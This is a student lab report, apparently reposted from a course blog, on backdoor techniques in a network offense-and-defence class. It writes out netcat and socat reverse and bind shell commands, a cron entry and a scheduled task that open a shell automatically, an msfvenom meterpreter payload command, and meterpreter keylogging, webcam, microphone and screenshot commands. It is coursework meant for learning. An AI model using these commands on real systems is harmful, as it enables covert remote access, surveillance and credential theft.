zoukankan      html  css  js  c++  java
  • 20144303石宇森《网络对抗》后门原理与实践

    20144303石宇森《网络对抗》 后门原理与实践

    基础问题回答

    (1)例举你能想到的一个后门进入到你系统中的可能方式?

    • 下载软件时,后门捆绑在下载的软件上,与软件一起安装进入了系统

    (2)例举你知道的后门如何启动起来(win及linux)的方式?

    • Windows:用户自己运行了后门软件、设置了任务计划启动

    • linux:设置了cron启动,在到达规定的时间时后门启动

    (3)Meterpreter有哪些给你映像深刻的功能?

    最可怕的就是使用靶机的摄像头进行拍照和录像吧。感觉在电脑前的一举一动都能被攻击主机掌握。另外就是获取目标机键入信息的功能。确实十分强大,攻击方可以掌握我们输入的所有东西,像输入的密码、发送的消息什么的已经不算是秘密了。

    细思极恐,好像只要黑客想知道的东西没有他没办法搞定的。我们这样一个简单的后门软件都能有如此强大的功能。应该是学好网络攻防,走遍天下都不怕了。

    (4)如何发现自己有系统有没有被安装后门?

    简单的方法就是通过杀毒软件杀毒吧。还可以查看进程列表,注册表。

    实验总结与体会

    实践总结:

    • 通过此次实验,掌握了一下基本内容:
    • Windows如何获取目标主机的shell:使用ncat打开监听端口,目标主机连接到端口时就获得了其shell
    • linux如何获取目标主机的shell:通过命令nc -l -p 打开端口,等待目标主机连接即可获得其shell
    • 学会打开cron启动
    • 掌握打开任务计划启动的方法
    • 掌握生成后门文件的方法,并将其通过ncat或者socat传输给目标主机
    • 了解一些常见的meterpreter命令,并使用一些基本的命令攻击靶机(如使用目标机摄像头、截取目标机屏幕等)

    心得体会

    完成这次实验后,掌握了打开不同操作系统下打开后门的方法,学会了如何在linux下生成一个后门软件,通过实践熟悉了meterpreter的各个命令的使用方法和功能。另外,通过这次亲身实践,也体会到了黑客软件功能的强大,作为普通计算机用户的我们只要稍不留神,身上的大量信息就有可能被黑客盗取。这也从一方面说明了学好这门课程的重要性,不只是要懂得如何完成攻击,更重要的是要通过学习掌握预防攻击,反抗攻击的方法。真是实践出真知啊!

    实验过程记录

    一、使用netcat获取主机操作Shell,cron启动:

    Windows获取linux的shell:

    1、在Windows下查看主机的ip地址

    2、ncat.exe -l -p 4303 打开监听

    3、nc 192.168.75.129 4303 -e /bin/sh 在linux下反弹式连接到Windows

    4、Windows获得了linux的shell

    linux获得Windows的shell:

    1、查看linux的ip地址

    2、nc -l -p 4303打开监听端口

    3、ncat.exe -e cmd.exe 192.168.75.128 4303 让Windows连接到linux上

    4、linux获得了Windows主机的shell

    cron启动:

    1、Windows打开监听端口

    2、用指令crontab -e 对定时任务进行编辑。将最后一行修改为

    45 * * * * /bin/netcat 192.168.75.129 4303 -e /bin/sh
    

    3、等到每个小时的45分时,linux会自动打开后门,获取linux的shell

    二、使用socat获取主机操作Shell, 任务计划启动

    1、新建一个触发器,开始任务选择工作站锁定时。

    2、新建操作,选择启动程序,程序定位到socat.exe,参数填

    tcp-listen:4303 exec:cmd.exe,pty,stderr
    

    3、按ALT+L锁定计算机用户,使新建的操作触发

    4、此时,在linux端下使用命令socat - tcp:192.168.75.129:4303连接到Windows主机,获取Windows的shell

    三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    1、使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20144303.exe自动生成一个后门程序

    2、windows打开监听端口,等待linux传输后门文件

    3、kali端将后门软件传输给Windows

    四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    1、输入msfconsole进入msf控制台

    2、修改IP地址和端口号

    3、在windows下打开后门软件

    4、使用exploit命令对Windows进行攻击

    5、攻击成功,kali获得了Windows的shell

    6、screenshot命令截取目标机的屏幕

    7、使用摄像头拍照、录像。(不知为何失败了)

    8、使用命令record_mic截取一段音频

    9、使用命令keyscan_start和keysca_dump捕获靶机的键入信息

    10、查看当前用户

    11、查看文件

    12、命令靶机关机

  • 相关阅读:
    基于吉日嘎底层架构的Web端权限管理操作演示-日志管理
    基于吉日嘎底层架构的Web端权限管理操作演示-组织机构管理
    基于吉日嘎底层架构的Web端权限管理操作演示-菜单模块管理
    基于吉日嘎底层架构的Web端权限管理操作演示-角色管理
    基于吉日嘎底层架构的Web端权限管理操作演示-用户管理
    扩展吉日嘎拉的用户角色管理,让用户角色编码和名称在一个组织里面唯一
    Redis 3.2.100 Windows 32位下载
    C#开发中Windows域认证登录2016(扩展吉日嘎拉GPM系统V4.2)
    JVM对象
    将博客搬至CSDN
  • 原文地址:https://www.cnblogs.com/20144303sys/p/6583059.html
Copyright © 2011-2022 走看看